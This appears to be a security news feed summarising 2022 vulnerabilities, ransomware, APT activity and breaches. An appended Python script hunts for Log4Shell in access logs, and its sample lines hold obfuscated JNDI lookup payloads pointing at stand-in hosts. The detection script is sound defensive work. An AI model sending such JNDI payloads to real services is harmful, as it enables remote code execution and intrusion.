The number of reported ICS vulnerabilities has jumped by 110% over the last 4 years #vuln #cyber #threats #informatique
An unusual XSS vulnerability in the Horde webmailer. The flaw lets an attacker craft a malicious OpenOffice document that, when previewed as an email attachment, enables the attacker to steal all of the victim's emails. Since no official patch is available yet, we strongly recommend disabling the affected feature #vuln #informatique
https://blog.sonarsource.com/horde-webmail-account-takeover-via-email
UNC2596 observed leveraging vulnerabilities to deploy #Cuba #ransomware. Beyond commonplace tools such as Cobalt Strike BEACON and NetSupport, UNC2596 has used novel #malware, including BURNTCIGAR to disable endpoint protection, WEDGECUT to enumerate active hosts, and the BUGHATCH custom downloader. COLDDRAW (Mandiant's name for the Cuba ransomware) operations have impacted dozens of organizations across more than ten countries, including some within critical infrastructure. #microsoft #mail #vuln #cyber #threats #informatique
The Chinese security firm « Pangu Lab » published a report about a top-tier APT backdoor, now tracked as Bvp47, that is linked to the Equation Group, the advanced persistent threat actor tied to the NSA. Bvp47 remained almost undetected until today, despite having first been submitted to the VirusTotal antivirus database close to a decade ago, in late 2013. The tool is well-designed, powerful, and widely adapted. Its network attack capability, equipped with 0-day vulnerabilities, was unstoppable, and its data acquisition under covert control took little effort. Pangu Lab uses the code name « Operation Telescreen » for several Bvp47 incidents. A telescreen is a device imagined by British writer George Orwell in his novel « 1984 ». #usa #networks #nsa #snowden #linux #vuln #0day #backdoor #cyber #apt #network #threats #informatique
https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/
🔥 CVE-2022-24086: Successful exploitation could lead to RCE by an unauthenticated user in Magento Open Source and Adobe Commerce.
https://threatpost.com/new-critical-rce-bug-found-in-adobe-commerce-magento/178554/
💥 CVE-2022-22620: may allow remote takeover of many Apple devices. The vulnerability affects older models as well as the most recent ones. This vulnerability is already being exploited ITW (in the wild). #apple #vuln #ios #macos #iphone #ipod #ipad #mac #macbook #imac #safari #cyber #threats #informatique
Cyber attack on MacGeneration (macg.co). The attackers exploited a flaw in a third-party module to get into the infrastructure and access the database server. The data of 102,262 members was compromised. #apple #vuln #france #databreach #cyber #threats #informatique
https://www.macg.co/macgeneration/2022/02/macgeneration-victime-dune-attaque-informatique-127149
🔔 CVE-2022-20653: A vulnerability in the DNS-based Authentication of Named Entities (DANE) email verification component of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-dos-MxZvGtgU
🔥 Threat actors are actively exploiting CVE-2022-21882 - #Microsoft Win32k Privilege Escalation Vulnerability #windows #vuln #informatique
Discovery of 23 high-impact vulnerabilities in the #software of one of the major Independent BIOS Developers (IBV). These vulnerabilities impact not only a single vendor, but every vendor that adopted the IBV code into its #UEFI #firmware. The verified list of impacted vendors consists of: #Fujitsu, #Siemens, #Dell, #HP, #HPE, #Lenovo, #Microsoft, #Intel and #Bull #Atos. #vuln #informatique
https://www.binarly.io/posts/An_In_Depth_Look_at_the_23_High_Impact_Vulnerabilities/index.html
CVE-2021-40724 - RCE in Adobe Acrobat Reader for Android #vuln #informatique
A 19-year-old German IT security specialist, David Colombo, quietly hacked several Teslas located on the other side of the world. As a result, he could remotely perform a whole range of actions, each more impressive than the last. #allemagne #hackers #vuln #tesla #automotive #cyber #threats #informatique
https://iphonesoft.fr/2022/01/12/hackeur-allemand-prendre-controle-25-tesla-distance
A teenage security researcher, David Colombo, claimed that he can remotely control various functions in 25 Teslas across 13 countries. #germany #hackers #vuln #tesla #automotive #cyber #threats #informatique
https://www.nasdaq.com/articles/teenage-researcher-claims-control-over-25-teslas
New Windows Server updates cause DC boot loops and break Hyper-V. The most serious issue introduced by these #updates is that Windows Domain Controllers enter a boot loop, with servers getting into an endless cycle of #Windows starting and then rebooting after a few minutes. After installing the updates, #Windows Resilient File System (ReFS) volumes are no longer accessible or are seen as RAW (unformatted). In addition to the boot loops, Hyper-V no longer starts on the server. Microsoft released security updates yesterday to fix four different Hyper-V vulnerabilities (CVE-2022-21901, CVE-2022-21900, CVE-2022-21905, and CVE-2022-21847), which are likely causing this issue. #vuln #microsoft #windows #bugs #informatique
KB5009543 & KB5009566 - After installing #Microsoft updates, #Windows users find their L2TP VPN connections broken when attempting to connect using the Windows #VPN client. For the moment, it is not clear what caused the « bug ». #vuln #internet #informatique
The largest sports NFT platform, Lympo (lympo.io), has been hit by a cyber attack. 165.2 million LMT tokens ($18.7 million) were stolen after a security flaw was exploited. #vuln #cryptocurrencies #threats #informatique
https://medium.com/lympo-official/community-update-2-85805b0555ce
(CVE-2021-20038 | CVE-2021-20039 | CVE-2021-20040 | CVE-2021-20041 | CVE-2021-20042) - SonicWall SMA 100 multiple vulnerabilities. As these devices are designed to be exposed to the internet, the only effective remediation for these issues is to apply the vendor-supplied updates. #sonicwall #devices #vuln #software #threats #informatique
Microsoft today released updates to plug nearly 120 security holes in Windows and supported #software. The most severe flaw addressed today is 🔥 CVE-2022-21907, a critical remote code execution flaw in the « HTTP Protocol Stack » (HTTP.sys). Microsoft says the flaw affects Windows 10 and Windows 11, as well as Server 2019 and Server 2022. #vuln #microsoft #windows #threats #informatique
https://krebsonsecurity.com/2022/01/wormable-flaw-leads-january-2022-patch-tuesday/
APT35 (aka Charming Kitten, TA453, Phosphorus), which is suspected to be an Iranian nation-state actor, exploits Log4j vulnerability (CVE-2021-44228) to distribute new modular #Windows #PowerShell toolkit.
#usa #iran #cyber #microsoft #software #vuln #backdoor #malware #informatique
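The Log4Shell exploitation mentioned above is driven by a `${jndi:...}` lookup string that the attacker plants in any field Log4j ends up logging (User-Agent, URL, headers), usually wrapped in nested-lookup and URL-encoding tricks to slip past naive string matching. The following is an added hunting example, not code from the page, from the APT35 research, or from any vendor: it normalizes constructed sample access-log lines (repeated URL-decoding, then collapsing `${lower:...}`, `${upper:...}` and `${x:-default}` obfuscations) and flags the JNDI lookups that remain. The log lines and the scheme list are assumptions for illustration, and the resolver is a heuristic rather than a full Log4j substitution engine.

```python
"""Hunt for CVE-2021-44228 (Log4Shell) lookup strings in access logs.

Added example; not code from the page, from APT35 research, or from any vendor.
The log lines below are constructed samples. Nested-lookup resolution covers the
${lower:...}, ${upper:...} and ${x:-default} obfuscations; it is a hunting
heuristic, not a complete Log4j substitution engine.
"""
import re
from urllib.parse import unquote

# Constructed sample lines (assumed format: combined log with User-Agent last).
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Jan/2022:10:12:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [11/Jan/2022:10:12:03 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [11/Jan/2022:10:12:05 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.11/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.11 - - [11/Jan/2022:10:12:07 +0000] "GET /login HTTP/1.1" 200 0 "%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fc%7D" "Mozilla"',
    '10.0.0.13 - - [11/Jan/2022:10:12:09 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 0 "-" "test"',
]

# An innermost ${...} (no further braces inside it).
_INNER = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup using one of the URL schemes the Log4j JNDI lookup accepts.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Literal an innermost lookup collapses to, or None to leave it untouched."""
    if body.lower().startswith("jndi:"):
        return None                       # the payload itself: never collapse it
    if ":-" in body:                      # ${anything:-literal} -> literal (also ${::-j})
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.lower() == "lower":   # ${lower:J} -> j
        return arg.lower()
    if sep and name.lower() == "upper":   # ${upper:j} -> J
        return arg.upper()
    return None                           # ${env:HOME} etc.: unknown lookup, keep


def _sub(match: re.Match) -> str:
    resolved = _resolve(match.group(1))
    return match.group(0) if resolved is None else resolved


def normalize(text: str) -> str:
    """URL-decode (bounded) and collapse nested lookups until nothing changes."""
    for _ in range(3):                    # attackers double/triple encode
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        new = _INNER.sub(_sub, text)
        if new == text:                   # only unresolvable lookups remain
            return text
        text = new


def find_payload(line: str):
    """Return the normalized JNDI lookup found in the line, or None."""
    norm = normalize(line)
    match = _JNDI.search(norm)
    if not match:
        return None
    end = norm.find("}", match.start())   # lookup runs to its closing brace
    return norm[match.start(): end + 1 if end != -1 else len(norm)]


def scan(lines):
    """Return (index, payload) for every line carrying a Log4Shell lookup."""
    hits = []
    for i, line in enumerate(lines):
        payload = find_payload(line)
        if payload is not None:
            hits.append((i, payload))
    return hits


if __name__ == "__main__":
    for idx, payload in scan(SAMPLE_LOGS):
        print(f"line {idx}: {payload}")
```

The benign `${env:HOME}` line is left alone on purpose: a plain `${` match would drown a SOC in false positives, so the rule only fires on a JNDI lookup with a known scheme after the obfuscation has been peeled off. Feed it real lines with `scan(open(path))` and pivot on the extracted host for the callback server.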
sc(r)apy | full metal packets
> We Are the Borg
> You Will be Assimilated
> Resistance is Futile